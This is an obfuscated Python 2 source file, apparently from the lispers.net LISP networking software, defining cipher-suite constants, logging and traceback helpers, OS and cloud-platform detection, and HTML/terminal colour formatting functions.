if 9 - 9: Oo0Ooo - i11iIiiIii - OOooOOo * Ii1I + ooOoO0o
if 44 - 44: II111iiii
if 52 - 52: I1ii11iIi11i - Oo0Ooo + I1ii11iIi11i % o0oOOo0O0Ooo
if 35 - 35: iIii1I11I1II1
if 42 - 42: I1Ii111 . I1IiiI . i1IIi + OoOoOO00 + OOooOOo + I1IiiI
if 31 - 31: iII111i . OOooOOo - ooOoO0o . OoooooooOO / OoooooooOO
if 56 - 56: OoO0O00 / oO0o / i11iIiiIii + OoooooooOO - Oo0Ooo - I11i
if 21 - 21: O0 % IiII . I1IiiI / II111iiii + IiII
if 53 - 53: oO0o - I1IiiI - oO0o * iII111i
if 71 - 71: O0 - iIii1I11I1II1
if 12 - 12: OOooOOo / o0oOOo0O0Ooo
if 42 - 42: Oo0Ooo
if 19 - 19: oO0o % I1ii11iIi11i * iIii1I11I1II1 + I1IiiI
if 46 - 46: Oo0Ooo
if 1 - 1: iII111i
if 97 - 97: OOooOOo + iII111i + O0 + i11iIiiIii
if 77 - 77: o0oOOo0O0Ooo / OoooooooOO
if 46 - 46: o0oOOo0O0Ooo % iIii1I11I1II1 . iII111i % iII111i + i11iIiiIii
if 72 - 72: iIii1I11I1II1 * Ii1I % ooOoO0o / OoO0O00
if 35 - 35: ooOoO0o + i1IIi % I1ii11iIi11i % I11i + oO0o
if 17 - 17: i1IIi
if 21 - 21: Oo0Ooo
if 29 - 29: I11i / II111iiii / ooOoO0o * OOooOOo
if 10 - 10: I1Ii111 % IiII * IiII . I11i / Ii1I % OOooOOo
if 49 - 49: OoO0O00 / oO0o + O0 * o0oOOo0O0Ooo
if 28 - 28: ooOoO0o + i11iIiiIii / I11i % OoOoOO00 % Oo0Ooo - O0
if 54 - 54: i1IIi + II111iiii
LISP_CS_1024 = 0
LISP_CS_1024_G = 2
LISP_CS_1024_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF
if 83 - 83: I1ii11iIi11i - I1IiiI + OOooOOo
LISP_CS_2048_CBC = 1
LISP_CS_2048_CBC_G = 2
LISP_CS_2048_CBC_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF
if 5 - 5: Ii1I
LISP_CS_25519_CBC = 2
LISP_CS_2048_GCM = 3
if 46 - 46: IiII
LISP_CS_3072 = 4
LISP_CS_3072_G = 2
LISP_CS_3072_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D04507A33A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864D87602733EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E208E24FA074E5AB3143DB5BFCE0FD108E4B82D120A93AD2CAFFFFFFFFFFFFFFFF
if 45 - 45: ooOoO0o
LISP_CS_25519_GCM = 5
LISP_CS_25519_CHACHA = 6
if 21 - 21: oO0o . I1Ii111 . OOooOOo / Oo0Ooo / I1Ii111
LISP_4_32_MASK = 0xFFFFFFFF
LISP_8_64_MASK = 0xFFFFFFFFFFFFFFFF
LISP_16_128_MASK = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
if 17 - 17: OOooOOo / OOooOOo / I11i
if 1 - 1: i1IIi . i11iIiiIii % OOooOOo
if 82 - 82: iIii1I11I1II1 + Oo0Ooo . iIii1I11I1II1 % IiII / Ii1I . Ii1I
if 14 - 14: o0oOOo0O0Ooo . OOooOOo . I11i + OoooooooOO - OOooOOo + IiII
if 9 - 9: Ii1I
if 59 - 59: I1IiiI * II111iiii . O0
if 56 - 56: Ii1I - iII111i % I1IiiI - o0oOOo0O0Ooo
if 51 - 51: O0 / ooOoO0o * iIii1I11I1II1 + I1ii11iIi11i + o0oOOo0O0Ooo
def lisp_record_traceback ( * args ) :
if 98 - 98: iIii1I11I1II1 * I1ii11iIi11i * OOooOOo + ooOoO0o % i11iIiiIii % O0
i1 = datetime . datetime . now ( ) . strftime ( "%m/%d/%y %H:%M:%S.%f" ) [ : - 3 ]
OO0oOOoo = open ( "./logs/lisp-traceback.log" , "a" )
OO0oOOoo . write ( "---------- Exception occurred: {} ----------\n" . format ( i1 ) )
try :
traceback . print_last ( file = OO0oOOoo )
except :
OO0oOOoo . write ( "traceback.print_last(file=fd) failed" )
if 52 - 52: o0oOOo0O0Ooo % Oo0Ooo
try :
traceback . print_last ( )
except :
print ( "traceback.print_last() failed" )
if 64 - 64: O0 % I11i % O0 * OoO0O00 . oO0o + I1IiiI
OO0oOOoo . close ( )
return
if 75 - 75: I11i . OoooooooOO % o0oOOo0O0Ooo * I11i % OoooooooOO
if 13 - 13: IiII / i11iIiiIii % II111iiii % I11i . I1ii11iIi11i
if 8 - 8: OoOoOO00 + Oo0Ooo - II111iiii
if 11 - 11: i1IIi % i11iIiiIii - i1IIi * OoOoOO00
if 39 - 39: I1Ii111
if 86 - 86: I11i * I1IiiI + I11i + II111iiii
if 8 - 8: I1Ii111 - iII111i / ooOoO0o
def lisp_set_exception ( ) :
sys . excepthook = lisp_record_traceback
return
if 96 - 96: OoOoOO00
if 29 - 29: I1ii11iIi11i / i1IIi . I1IiiI - OoOoOO00 - OoOoOO00 - Ii1I
if 20 - 20: i1IIi % OoO0O00 . I1IiiI / IiII * i11iIiiIii * OOooOOo
if 85 - 85: o0oOOo0O0Ooo . OoOoOO00 / ooOoO0o . O0 % I1Ii111
if 90 - 90: Oo0Ooo % O0 * iIii1I11I1II1 . iII111i
if 8 - 8: ooOoO0o + II111iiii / iII111i / I11i
if 74 - 74: O0 / i1IIi
def lisp_is_raspbian ( ) :
if ( platform . dist ( ) [ 0 ] != "debian" ) : return ( False )
return ( platform . machine ( ) in [ "armv6l" , "armv7l" ] )
if 78 - 78: OoooooooOO . OoO0O00 + ooOoO0o - i1IIi
if 31 - 31: OoooooooOO . OOooOOo
if 83 - 83: iII111i . O0 / Oo0Ooo / OOooOOo - II111iiii
if 100 - 100: OoO0O00
if 46 - 46: OoOoOO00 / iIii1I11I1II1 % iII111i . iIii1I11I1II1 * iII111i
if 38 - 38: I1ii11iIi11i - iII111i / O0 . I1Ii111
if 45 - 45: I1Ii111
def lisp_is_ubuntu ( ) :
return ( platform . dist ( ) [ 0 ] == "Ubuntu" )
if 83 - 83: OoOoOO00 . OoooooooOO
if 58 - 58: i11iIiiIii + OoooooooOO % OoooooooOO / IiII / i11iIiiIii
if 62 - 62: OoO0O00 / I1ii11iIi11i
if 7 - 7: OoooooooOO . IiII
if 53 - 53: Ii1I % Ii1I * o0oOOo0O0Ooo + OoOoOO00
if 92 - 92: OoooooooOO + i1IIi / Ii1I * O0
if 100 - 100: ooOoO0o % iIii1I11I1II1 * II111iiii - iII111i
def lisp_is_fedora ( ) :
return ( platform . dist ( ) [ 0 ] == "fedora" )
if 92 - 92: ooOoO0o
if 22 - 22: Oo0Ooo % iII111i * I1ii11iIi11i / OOooOOo % i11iIiiIii * I11i
if 95 - 95: OoooooooOO - IiII * I1IiiI + OoOoOO00
if 10 - 10: o0oOOo0O0Ooo / i11iIiiIii
if 92 - 92: I11i . I1Ii111
if 85 - 85: I1ii11iIi11i . I1Ii111
if 78 - 78: ooOoO0o * I1Ii111 + iIii1I11I1II1 + iIii1I11I1II1 / I1Ii111 . Ii1I
def lisp_is_centos ( ) :
return ( platform . dist ( ) [ 0 ] == "centos" )
if 97 - 97: ooOoO0o / I1Ii111 % i1IIi % I1ii11iIi11i
if 18 - 18: iIii1I11I1II1 % I11i
if 95 - 95: ooOoO0o + i11iIiiIii * I1Ii111 - i1IIi * I1Ii111 - iIii1I11I1II1
if 75 - 75: OoooooooOO * IiII
if 9 - 9: IiII - II111iiii + O0 / iIii1I11I1II1 / i11iIiiIii
if 39 - 39: IiII * Oo0Ooo + iIii1I11I1II1 - IiII + OOooOOo
if 69 - 69: O0
def lisp_is_debian ( ) :
return ( platform . dist ( ) [ 0 ] == "debian" )
if 85 - 85: ooOoO0o / O0
if 18 - 18: o0oOOo0O0Ooo % O0 * I1ii11iIi11i
if 62 - 62: I1Ii111 . IiII . OoooooooOO
if 11 - 11: OOooOOo / I11i
if 73 - 73: i1IIi / i11iIiiIii
if 58 - 58: Oo0Ooo . II111iiii + oO0o - i11iIiiIii / II111iiii / O0
if 85 - 85: OoOoOO00 + OOooOOo
def lisp_is_debian_kali ( ) :
return ( platform . dist ( ) [ 0 ] == "Kali" )
if 10 - 10: IiII / OoO0O00 + OoOoOO00 / i1IIi
if 27 - 27: Ii1I
if 67 - 67: I1IiiI
if 55 - 55: I1ii11iIi11i - iII111i * o0oOOo0O0Ooo + OoOoOO00 * OoOoOO00 * O0
if 91 - 91: I1Ii111 - OOooOOo % iIii1I11I1II1 - OoooooooOO % ooOoO0o
if 98 - 98: OoO0O00 . OoO0O00 * oO0o * II111iiii * I1Ii111
if 92 - 92: Oo0Ooo
def lisp_is_macos ( ) :
return ( platform . uname ( ) [ 0 ] == "Darwin" )
if 40 - 40: OoOoOO00 / IiII
if 79 - 79: OoO0O00 - iIii1I11I1II1 + Ii1I - I1Ii111
if 93 - 93: II111iiii . I1IiiI - Oo0Ooo + OoOoOO00
if 61 - 61: II111iiii
if 15 - 15: i11iIiiIii % I1IiiI * I11i / I1Ii111
if 90 - 90: iII111i
if 31 - 31: OOooOOo + O0
def lisp_is_alpine ( ) :
return ( os . path . exists ( "/etc/alpine-release" ) )
if 87 - 87: ooOoO0o
if 45 - 45: OoO0O00 / OoooooooOO - iII111i / Ii1I % IiII
if 83 - 83: I1IiiI . iIii1I11I1II1 - IiII * i11iIiiIii
if 20 - 20: i1IIi * I1Ii111 + II111iiii % o0oOOo0O0Ooo % oO0o
if 13 - 13: Oo0Ooo
if 60 - 60: I1ii11iIi11i * I1IiiI
if 17 - 17: OOooOOo % Oo0Ooo / I1ii11iIi11i . IiII * OOooOOo - II111iiii
def lisp_is_x86 ( ) :
i1i1IIii1i1 = platform . machine ( )
return ( i1i1IIii1i1 in ( "x86" , "i686" , "x86_64" ) )
if 65 - 65: I1IiiI + OoOoOO00 / OOooOOo
if 83 - 83: o0oOOo0O0Ooo . iII111i - Oo0Ooo
if 65 - 65: iIii1I11I1II1 / ooOoO0o . IiII - II111iiii
if 72 - 72: iIii1I11I1II1 / IiII % iII111i % OOooOOo - I11i % OOooOOo
if 100 - 100: Oo0Ooo + i11iIiiIii
if 71 - 71: I11i / o0oOOo0O0Ooo / I1Ii111 % OOooOOo
if 51 - 51: IiII * O0 / II111iiii . Ii1I % OOooOOo / I1IiiI
def lisp_is_linux ( ) :
return ( platform . uname ( ) [ 0 ] == "Linux" )
if 9 - 9: I1IiiI % I1IiiI % II111iiii
if 30 - 30: IiII + I1Ii111 - IiII . IiII - II111iiii + O0
if 86 - 86: i1IIi
if 41 - 41: OoOoOO00 * I11i / OoOoOO00 % oO0o
if 18 - 18: II111iiii . OoooooooOO % OoOoOO00 % Ii1I
if 9 - 9: OoO0O00 - Oo0Ooo * OoooooooOO . Oo0Ooo
if 2 - 2: OoooooooOO % OOooOOo
def lisp_on_aws ( ) :
oOoOOo0oo0 = commands . getoutput ( "sudo dmidecode -s bios-version" )
if ( oOoOOo0oo0 . find ( "command not found" ) != - 1 and lisp_on_docker ( ) ) :
o0O0Oo00Oo0o = bold ( "AWS check" , False )
lprint ( "{} - dmidecode not installed in docker container" . format ( o0O0Oo00Oo0o ) )
if 74 - 74: Oo0Ooo / i11iIiiIii - II111iiii * o0oOOo0O0Ooo
return ( oOoOOo0oo0 . lower ( ) . find ( "amazon" ) != - 1 )
if 5 - 5: OOooOOo - OOooOOo . Oo0Ooo + OoOoOO00 - OOooOOo . oO0o
if 31 - 31: II111iiii - iIii1I11I1II1 - iIii1I11I1II1 % I11i
if 12 - 12: iIii1I11I1II1
if 20 - 20: o0oOOo0O0Ooo / i1IIi
if 71 - 71: OoOoOO00 . i1IIi
if 94 - 94: OOooOOo . I1Ii111
if 84 - 84: O0 . I11i - II111iiii . ooOoO0o / II111iiii
def lisp_on_gcp ( ) :
oOoOOo0oo0 = commands . getoutput ( "sudo dmidecode -s bios-version" )
return ( oOoOOo0oo0 . lower ( ) . find ( "google" ) != - 1 )
if 47 - 47: OoooooooOO
if 4 - 4: I1IiiI % I11i
if 10 - 10: IiII . OoooooooOO - OoO0O00 + IiII - O0
if 82 - 82: ooOoO0o + II111iiii
if 39 - 39: oO0o % iIii1I11I1II1 % O0 % OoooooooOO * I1ii11iIi11i + iII111i
if 68 - 68: Oo0Ooo + i11iIiiIii
if 69 - 69: iIii1I11I1II1 * iIii1I11I1II1 * i11iIiiIii + I1IiiI / OOooOOo % Ii1I
def lisp_on_docker ( ) :
return ( os . path . exists ( "/.dockerenv" ) )
if 58 - 58: OOooOOo * o0oOOo0O0Ooo + O0 % OOooOOo
if 25 - 25: Oo0Ooo % I1ii11iIi11i * ooOoO0o
if 6 - 6: iII111i . IiII * OoOoOO00 . i1IIi
if 98 - 98: i1IIi
if 65 - 65: OoOoOO00 / OoO0O00 % IiII
if 45 - 45: OoOoOO00
if 66 - 66: OoO0O00
if 56 - 56: O0
def lisp_process_logfile ( ) :
OOo00 = "./logs/lisp-{}.log" . format ( lisp_log_id )
if ( os . path . exists ( OOo00 ) ) : return
if 37 - 37: i1IIi
sys . stdout . close ( )
sys . stdout = open ( OOo00 , "a" )
if 46 - 46: OoOoOO00 - I11i - Ii1I . i1IIi
lisp_print_banner ( bold ( "logfile rotation" , False ) )
return
if 35 - 35: II111iiii * I11i - OoooooooOO . I11i . I11i
if 11 - 11: I1Ii111 / OoOoOO00 + I11i % iIii1I11I1II1
if 42 - 42: I1ii11iIi11i * OoOoOO00 % ooOoO0o - OoOoOO00 . i11iIiiIii - I1Ii111
if 84 - 84: I1Ii111 - I1ii11iIi11i / I11i
if 13 - 13: IiII - Oo0Ooo - ooOoO0o
if 92 - 92: ooOoO0o / OoOoOO00 * OoO0O00 . I11i % II111iiii
if 71 - 71: I1Ii111 % i1IIi - II111iiii - OOooOOo + OOooOOo * ooOoO0o
if 51 - 51: iIii1I11I1II1 / OoOoOO00 + OOooOOo - I11i + iII111i
def lisp_i_am ( name ) :
global lisp_log_id , lisp_i_am_itr , lisp_i_am_etr , lisp_i_am_rtr
global lisp_i_am_mr , lisp_i_am_ms , lisp_i_am_ddt , lisp_i_am_core
global lisp_hostname
if 29 - 29: o0oOOo0O0Ooo % iIii1I11I1II1 . OoooooooOO % OoooooooOO % II111iiii / iII111i
lisp_log_id = name
if ( name == "itr" ) : lisp_i_am_itr = True
if ( name == "etr" ) : lisp_i_am_etr = True
if ( name == "rtr" ) : lisp_i_am_rtr = True
if ( name == "mr" ) : lisp_i_am_mr = True
if ( name == "ms" ) : lisp_i_am_ms = True
if ( name == "ddt" ) : lisp_i_am_ddt = True
if ( name == "core" ) : lisp_i_am_core = True
if 70 - 70: i11iIiiIii % iII111i
if 11 - 11: IiII % I1ii11iIi11i % Ii1I / II111iiii % I1Ii111 - Oo0Ooo
if 96 - 96: I1ii11iIi11i / II111iiii . Ii1I - iII111i * I11i * oO0o
if 76 - 76: Ii1I - II111iiii * OOooOOo / OoooooooOO
if 18 - 18: OoO0O00 + iIii1I11I1II1 - II111iiii - I1IiiI
lisp_hostname = socket . gethostname ( )
ooo = lisp_hostname . find ( "." )
if ( ooo != - 1 ) : lisp_hostname = lisp_hostname [ 0 : ooo ]
return
if 94 - 94: OoOoOO00 - Oo0Ooo - I1IiiI % i1IIi
if 19 - 19: o0oOOo0O0Ooo
if 42 - 42: i1IIi . I1IiiI / i1IIi + Ii1I
if 54 - 54: ooOoO0o % OOooOOo . I1Ii111 + oO0o - OOooOOo * I1IiiI
if 92 - 92: o0oOOo0O0Ooo + I1Ii111 / Oo0Ooo % OoO0O00 % IiII . OoooooooOO
if 52 - 52: ooOoO0o / i11iIiiIii - OOooOOo . IiII % iIii1I11I1II1 + o0oOOo0O0Ooo
if 71 - 71: oO0o % I11i * OoOoOO00 . O0 / Ii1I . I1ii11iIi11i
if 58 - 58: Oo0Ooo / oO0o
if 44 - 44: OOooOOo
def lprint ( * args ) :
O0O0o0o0o = ( "force" in args )
if ( lisp_debug_logging == False and O0O0o0o0o == False ) : return
if 9 - 9: Oo0Ooo + OoOoOO00 - iIii1I11I1II1 - Ii1I + o0oOOo0O0Ooo
lisp_process_logfile ( )
i1 = datetime . datetime . now ( ) . strftime ( "%m/%d/%y %H:%M:%S.%f" )
i1 = i1 [ : - 3 ]
print "{}: {}:" . format ( i1 , lisp_log_id ) ,
if 97 - 97: OOooOOo
for OO0OOooOO0 in args :
if ( OO0OOooOO0 == "force" ) : continue
print OO0OOooOO0 ,
if 31 - 31: I1IiiI * oO0o + OoooooooOO - iII111i / OoooooooOO
print ""
if 19 - 19: IiII * ooOoO0o * o0oOOo0O0Ooo + O0 / O0
try : sys . stdout . flush ( )
except : pass
return
if 73 - 73: iIii1I11I1II1 / iIii1I11I1II1 - oO0o
if 91 - 91: oO0o + I1IiiI
if 59 - 59: I1IiiI + i11iIiiIii + i1IIi / I11i
if 44 - 44: I11i . OoOoOO00 * I1IiiI + OoooooooOO - iII111i - IiII
if 15 - 15: IiII / O0 . o0oOOo0O0Ooo . i11iIiiIii
if 59 - 59: I1Ii111 - o0oOOo0O0Ooo - ooOoO0o
if 48 - 48: i1IIi + I11i % OoOoOO00 / Oo0Ooo - o0oOOo0O0Ooo
if 67 - 67: oO0o % o0oOOo0O0Ooo . OoooooooOO + OOooOOo * I11i * OoOoOO00
def dprint ( * args ) :
if ( lisp_data_plane_logging ) : lprint ( * args )
return
if 36 - 36: O0 + Oo0Ooo
if 5 - 5: Oo0Ooo * OoOoOO00
if 46 - 46: ooOoO0o
if 33 - 33: iII111i - II111iiii * OoooooooOO - Oo0Ooo - OOooOOo
if 84 - 84: I1Ii111 + Oo0Ooo - OoOoOO00 * OoOoOO00
if 61 - 61: OoooooooOO . oO0o . OoooooooOO / Oo0Ooo
if 72 - 72: i1IIi
if 82 - 82: OoOoOO00 + OoooooooOO / i11iIiiIii * I1ii11iIi11i . OoooooooOO
def debug ( * args ) :
lisp_process_logfile ( )
if 63 - 63: I1ii11iIi11i
i1 = datetime . datetime . now ( ) . strftime ( "%m/%d/%y %H:%M:%S.%f" )
i1 = i1 [ : - 3 ]
if 6 - 6: ooOoO0o / I1ii11iIi11i
print red ( ">>>" , False ) ,
print "{}:" . format ( i1 ) ,
for OO0OOooOO0 in args : print OO0OOooOO0 ,
print red ( "<<<\n" , False )
try : sys . stdout . flush ( )
except : pass
return
if 57 - 57: I11i
if 67 - 67: OoO0O00 . ooOoO0o
if 87 - 87: oO0o % Ii1I
if 83 - 83: II111iiii - I11i
if 35 - 35: i1IIi - iIii1I11I1II1 + i1IIi
if 86 - 86: iIii1I11I1II1 + OoOoOO00 . i11iIiiIii - Ii1I
if 51 - 51: OoOoOO00
def lisp_print_banner ( string ) :
global lisp_version , lisp_hostname
if 14 - 14: IiII % oO0o % Oo0Ooo - i11iIiiIii
if ( lisp_version == "" ) :
lisp_version = commands . getoutput ( "cat lisp-version.txt" )
if 53 - 53: Ii1I % Oo0Ooo
O0ooOo0o0Oo = bold ( lisp_hostname , False )
lprint ( "lispers.net LISP {} {}, version {}, hostname {}" . format ( string ,
datetime . datetime . now ( ) , lisp_version , O0ooOo0o0Oo ) )
return
if 71 - 71: iIii1I11I1II1 - OOooOOo . I1IiiI % OoooooooOO + OOooOOo
if 26 - 26: Oo0Ooo + OOooOOo / OoO0O00 % OoOoOO00 % I1ii11iIi11i + II111iiii
if 31 - 31: I11i % OOooOOo * I11i
if 45 - 45: i1IIi . I1IiiI + OOooOOo - OoooooooOO % ooOoO0o
if 1 - 1: iIii1I11I1II1
if 93 - 93: i1IIi . i11iIiiIii . Oo0Ooo
if 99 - 99: I11i - I1Ii111 - oO0o % OoO0O00
def green ( string , html ) :
if ( html ) : return ( '<font color="green"><b>{}</b></font>' . format ( string ) )
return ( bold ( "\033[92m" + string + "\033[0m" , html ) )
if 21 - 21: II111iiii % I1ii11iIi11i . i1IIi - OoooooooOO
if 4 - 4: OoooooooOO . ooOoO0o
if 78 - 78: I1ii11iIi11i + I11i - O0
if 10 - 10: I1Ii111 % I1IiiI
if 97 - 97: OoooooooOO - I1Ii111
if 58 - 58: iIii1I11I1II1 + O0
if 30 - 30: ooOoO0o % iII111i * OOooOOo - I1ii11iIi11i * Ii1I % ooOoO0o
def green_last_sec ( string ) :
return ( green ( string , True ) )
if 46 - 46: i11iIiiIii - O0 . oO0o
if 100 - 100: I1IiiI / o0oOOo0O0Ooo * iII111i . O0 / OOooOOo
if 83 - 83: I1Ii111
if 48 - 48: II111iiii * OOooOOo * I1Ii111
if 50 - 50: IiII % i1IIi
if 21 - 21: OoooooooOO - iIii1I11I1II1
if 93 - 93: oO0o - o0oOOo0O0Ooo % OoOoOO00 . OoOoOO00 - ooOoO0o
def green_last_min ( string ) :
return ( '<font color="#58D68D"><b>{}</b></font>' . format ( string ) )
if 90 - 90: ooOoO0o + II111iiii * I1ii11iIi11i / Ii1I . o0oOOo0O0Ooo + o0oOOo0O0Ooo
if 40 - 40: ooOoO0o / OoOoOO00 % i11iIiiIii % I1ii11iIi11i / I1IiiI
if 62 - 62: i1IIi - OoOoOO00
if 62 - 62: i1IIi + Oo0Ooo % IiII
if 28 - 28: I1ii11iIi11i . i1IIi
if 10 - 10: OoO0O00 / Oo0Ooo
if 15 - 15: iII111i . OoOoOO00 / iII111i * I11i - I1IiiI % I1ii11iIi11i
def red ( string , html ) :
if ( html ) : return ( '<font color="red"><b>{}</b></font>' . format ( string ) )
return ( bold ( "\033[91m" + string + "\033[0m" , html ) )
if 57 - 57: O0 % OoOoOO00 % oO0o
if 45 - 45: I1ii11iIi11i + II111iiii * i11iIiiIii
if 13 - 13: OoooooooOO * oO0o - Ii1I / OOooOOo + I11i + IiII
if 39 - 39: iIii1I11I1II1 - OoooooooOO
if 81 - 81: I1ii11iIi11i - O0 * OoooooooOO
if 23 - 23: II111iiii / oO0o
if 28 - 28: Oo0Ooo * ooOoO0o - OoO0O00
def blue ( string , html ) :
if ( html ) : return ( '<font color="blue"><b>{}</b></font>' . format ( string ) )
return ( bold ( "\033[94m" + string + "\033[0m" , html ) )
if 19 - 19: I11i
if 67 - 67: O0 % iIii1I11I1II1 / IiII . i11iIiiIii - Ii1I + O0
if 27 - 27: OOooOOo
if 89 - 89: II111iiii / oO0o
if 14 - 14: OOooOOo . I1IiiI * ooOoO0o + II111iiii - ooOoO0o + OOooOOo
if 18 - 18: oO0o - o0oOOo0O0Ooo - I1IiiI - I1IiiI
if 54 - 54: Oo0Ooo + I1IiiI / iII111i . I1IiiI * OoOoOO00
def bold ( string , html ) :
if ( html ) : return ( "<b>{}</b>" . format ( string ) )
return ( "\033[1m" + string + "\033[0m" )
if 1 - 1: OoOoOO00 * OoO0O00 . i1IIi / Oo0Ooo . I1ii11iIi11i + Oo0Ooo
if 17 - 17: Oo0Ooo + OoO0O00 / Ii1I / iII111i * OOooOOo
if 29 - 29: OoO0O00 % OoooooooOO * oO0o / II111iiii - oO0o
if 19 - 19: i11iIiiIii
if 54 - 54: II111iiii . I11i
if 73 - 73: OoOoOO00 . I1IiiI
if 32 - 32: OoOoOO00 * I1IiiI % ooOoO0o * Ii1I . O0
def convert_font ( string ) :
i11i1i1I1iI1 = [ [ "[91m" , red ] , [ "[92m" , green ] , [ "[94m" , blue ] , [ "[1m" , bold ] ]
O0ooOo0 = "[0m"
if 53 - 53: OoooooooOO - IiII
for oOo in i11i1i1I1iI1 :
i1i = oOo [ 0 ]
IIIiiiI = oOo [ 1 ]
OoO00oo00 = len ( i1i )
ooo = string . find ( i1i )
if ( ooo != - 1 ) : break
if 76 - 76: OoooooooOO + Oo0Ooo % IiII . OoO0O00 + II111iiii
if 70 - 70: I1IiiI / I11i
while ( ooo != - 1 ) :
IIiiiiIiIIii = string [ ooo : : ] . find ( O0ooOo0 )
O0OO = string [ ooo + OoO00oo00 : ooo + IIiiiiIiIIii ]
string = string [ : ooo ] + IIIiiiI ( O0OO , True ) + string [ ooo + IIiiiiIiIIii + OoO00oo00 : : ]
if 39 - 39: I1ii11iIi11i + I1IiiI - iIii1I11I1II1 - o0oOOo0O0Ooo
ooo = string . find ( i1i )
if 7 - 7: IiII . OoOoOO00 / I1ii11iIi11i . OOooOOo * I11i - II111iiii
if 37 - 37: I1Ii111 . OoOoOO00 / O0 * iII111i
if 7 - 7: OoO0O00 * I11i + II111iiii % i11iIiiIii
if 8 - 8: ooOoO0o * O0
if 73 - 73: o0oOOo0O0Ooo / oO0o / I11i / OoO0O00
if ( string . find ( "[1m" ) != - 1 ) : string = convert_font ( string )
return ( string )
if 11 - 11: OoOoOO00 + IiII - OoooooooOO / OoO0O00
if 34 - 34: ooOoO0o
if 45 - 45: ooOoO0o / Oo0Ooo / Ii1I
if 44 - 44: I1ii11iIi11i - Ii1I / II111iiii * OoO0O00 * Oo0Ooo
if 73 - 73: o0oOOo0O0Ooo - I1IiiI * i1IIi / i11iIiiIii * OOooOOo % II111iiii
if 56 - 56: OoooooooOO * Oo0Ooo . Oo0Ooo . I1ii11iIi11i
if 24 - 24: Oo0Ooo . I11i * Ii1I % iII111i / OOooOOo
def lisp_space ( num ) :
Oo0Ooo0O0 = ""
for IiIIi1IiiIiI in range ( num ) : Oo0Ooo0O0 += " "
return ( Oo0Ooo0O0 )
if 23 - 23: I11i
if 40 - 40: o0oOOo0O0Ooo - II111iiii / Oo0Ooo
if 14 - 14: I1ii11iIi11i
if 5 - 5: o0oOOo0O0Ooo . iIii1I11I1II1 % iIii1I11I1II1
if 56 - 56: OoooooooOO - I11i - i1IIi
if 8 - 8: I1Ii111 / OOooOOo . I1IiiI + I1ii11iIi11i / i11iIiiIii
if 31 - 31: ooOoO0o - iIii1I11I1II1 + iII111i . Oo0Ooo / IiII % iIii1I11I1II1
def lisp_button ( string , url ) :
I11i1iIiiIiIi = '<button style="background-color:transparent;border-radius:10px; ' + 'type="button">'
if 49 - 49: OOooOOo . I1ii11iIi11i . i11iIiiIii - II111iiii / Ii1I
if 62 - 62: OOooOOo
if ( url == None ) :
i1I1i = I11i1iIiiIiIi + string + "</button>"
else :
OO0o = '<a href="{}">' . format ( url )
IiII1iiI = lisp_space ( 2 )
i1I1i = IiII1iiI + OO0o + I11i1iIiiIiIi + string + "</button></a>" + IiII1iiI
if 34 - 34: I1IiiI . oO0o + i1IIi
return ( i1I1i )
if 98 - 98: oO0o % IiII * i11iIiiIii % I1ii11iIi11i
if 29 - 29: IiII
if 66 - 66: Oo0Ooo
if 97 - 97: i1IIi - OoooooooOO / I1Ii111 * I1IiiI
if 55 - 55: o0oOOo0O0Ooo . iII111i
if 87 - 87: o0oOOo0O0Ooo % iIii1I11I1II1
if 100 - 100: I1Ii111 . I1IiiI * I1Ii111 - I1IiiI . I11i * Ii1I
def lisp_print_cour ( string ) :
Oo0Ooo0O0 = '<font face="Courier New">{}</font>' . format ( string )
return ( Oo0Ooo0O0 )
if 89 - 89: OoO0O00 + IiII * I1Ii111
if 28 - 28: OoooooooOO . oO0o % I1ii11iIi11i / i1IIi / OOooOOo
if 36 - 36: o0oOOo0O0Ooo + I11i - IiII + iIii1I11I1II1 + OoooooooOO
if 4 - 4: II111iiii . I11i + Ii1I * I1Ii111 . ooOoO0o
if 87 - 87: OoOoOO00 / OoO0O00 / i11iIiiIii
if 74 - 74: oO0o / I1ii11iIi11i % o0oOOo0O0Ooo
if 88 - 88: OoOoOO00 - i11iIiiIii % o0oOOo0O0Ooo * I11i + I1ii11iIi11i
def lisp_print_sans ( string ) :
Oo0Ooo0O0 = '<font face="Sans-Serif">{}</font>' . format ( string )
return ( Oo0Ooo0O0 )
if 52 - 52: II111iiii . I1IiiI + OoOoOO00 % OoO0O00
if 62 - 62: o0oOOo0O0Ooo
if 15 - 15: I11i + Ii1I . OOooOOo * OoO0O00 . OoOoOO00
if 18 - 18: i1IIi % II111iiii + I1Ii111 % Ii1I
if 72 - 72: iIii1I11I1II1
if 45 - 45: Oo0Ooo - o0oOOo0O0Ooo % I1Ii111
if 38 - 38: I1Ii111 % OOooOOo - OoooooooOO
def lisp_span ( string , hover_string ) :
Oo0Ooo0O0 = '<span title="{}">{}</span>' . format ( hover_string , string )
return ( Oo0Ooo0O0 )
if 87 - 87: OoO0O00 % I1IiiI
if 77 - 77: iIii1I11I1II1 - i1IIi . oO0o
if 26 - 26: o0oOOo0O0Ooo * IiII . i1IIi
